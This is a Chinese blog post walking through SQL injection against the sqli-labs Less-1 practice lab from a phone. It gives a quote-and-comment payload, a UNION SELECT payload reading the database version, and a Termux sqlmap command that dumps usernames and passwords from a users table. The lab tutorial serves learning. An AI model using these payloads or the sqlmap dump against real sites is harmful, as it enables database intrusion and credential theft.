[NB]手机端的sql注入

今天去踏青,看到灵帝说该发帖了,所以再水水

打开我们的靶场,输入id=1 正常显示
我们靶场的源码是$sql=”SELECT * FROM users WHERE id=’$id’ LIMIT 0,1″;
我们输入id=1′ –+
就相当于$sql=”SELECT * FROM users WHERE id=’$id’//’ LIMIT 0,1″;
把后面给注释掉了,这样我们就可以执行自己的语句
我们输入
http://192.168.3.133:3366/Less-1/?id=-1′ union select 1,version(),3 –+ 
//(字段是3,你也可以用order by自己慢慢试)
可以查看到数据库的靶场,当然如果需要也可以执行别的命令,这里不多讲

这时我们可以知道这个网站是存在注入点的,手机手动注入太累了,打开termux
apt install python2
git clone https://gitee.com/wayfeel/sqlmap
这是gitee加速过的,下载速度很快
然后我们cd进sqlmap目录
直接python2 sqlmap.py “http://192.168.3.133:3366/Less-1/?id=1” -D security -T users -C password,username –dump
爆出密码和用户名
更多sqlmap命令https://blog.csdn.net/weixin_45983744/article/details/104002419

这期的小工具是今天踏青时写的,很垃圾,所以不分享啦图片[1]-[NB]手机端的sql注入-葫芦芥子博客-云程工作室旗下官方网站,葫芦侠,芥子空间,云程DIY,丸子小程序,星宿UI,枫瑞博客网,云程工作室,云程APP,默然云后台系统,默然IAPP管理系统官网,默然官网,默然后台图片[2]-[NB]手机端的sql注入-葫芦芥子博客-云程工作室旗下官方网站,葫芦侠,芥子空间,云程DIY,丸子小程序,星宿UI,枫瑞博客网,云程工作室,云程APP,默然云后台系统,默然IAPP管理系统官网,默然官网,默然后台图片[3]-[NB]手机端的sql注入-葫芦芥子博客-云程工作室旗下官方网站,葫芦侠,芥子空间,云程DIY,丸子小程序,星宿UI,枫瑞博客网,云程工作室,云程APP,默然云后台系统,默然IAPP管理系统官网,默然官网,默然后台图片[4]-[NB]手机端的sql注入-葫芦芥子博客-云程工作室旗下官方网站,葫芦侠,芥子空间,云程DIY,丸子小程序,星宿UI,枫瑞博客网,云程工作室,云程APP,默然云后台系统,默然IAPP管理系统官网,默然官网,默然后台图片[5]-[NB]手机端的sql注入-葫芦芥子博客-云程工作室旗下官方网站,葫芦侠,芥子空间,云程DIY,丸子小程序,星宿UI,枫瑞博客网,云程工作室,云程APP,默然云后台系统,默然IAPP管理系统官网,默然官网,默然后台

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

图形验证码
取消
昵称表情代码图片

    暂无评论内容